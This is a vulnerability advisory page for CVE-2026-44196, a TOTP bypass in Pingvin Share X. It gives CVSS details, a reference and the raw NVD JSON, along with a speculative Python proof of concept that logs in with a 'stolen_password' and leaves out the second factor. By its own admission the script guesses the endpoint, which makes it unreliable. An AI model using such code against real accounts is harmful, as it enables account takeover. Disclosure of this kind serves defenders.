Security Vulnerability Report
CVE-2026-44196 CVSS 9.1 CRITICAL

CVE-2026-44196

Published: 2026-05-12 18:17:30
Last Modified: 2026-05-12 18:17:30

Description

Pingvin Share X is a secure and easy self-hosted file sharing platform. From 1.14.1 to 1.16.2, a critical authentication bypass vulnerability allows an attacker who has obtained a valid username and password to skip the second-factor authentication (TOTP) requirement entirely. An attacker still needs the user's password to reach this stage, however. This vulnerability is fixed in 1.16.3.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Pingvin Share X >= 1.14.1, <= 1.16.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Conceptual PoC for CVE-2026-44196
# This script demonstrates a login attempt that omits the TOTP check.
# Note: the specific endpoint and parameters depend on the actual application implementation.

target_url = "http://target-pingvin-share/api/login"
username = "[email protected]"
password = "stolen_password"

# Payload containing only username and password, omitting the TOTP code.
# In a vulnerable version, the server might accept this without 'totp_code'.
payload = {
    "username": username,
    "password": password,
}

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Authentication bypass successful! Token received.")
        print(f"[+] Response: {response.text}")
    else:
        print("[-] Login failed.")
except Exception as e:
    print(f"Error: {e}")

References

https://github.com/smp46/pingvin-share-x/security/advisories/GHSA-j679-vp39-qwqq
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44196", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:29.730", "lastModified": "2026-05-12T18:17:29.730", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pingvin Share X is a secure and easy self-hosted file sharing platform. From 1.14.1 to 1.16.2, a critical authentication bypass vulnerability allows an attacker who has obtained a valid username and password to skip the second-factor authentication (TOTP) requirement entirely. Although, an attacker still needs the user's password to reach this stage. This vulnerability is fixed in 1.16.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-697"}]}], "references": [{"url": "https://github.com/smp46/pingvin-share-x/security/advisories/GHSA-j679-vp39-qwqq", "source": "[email protected]"}]}}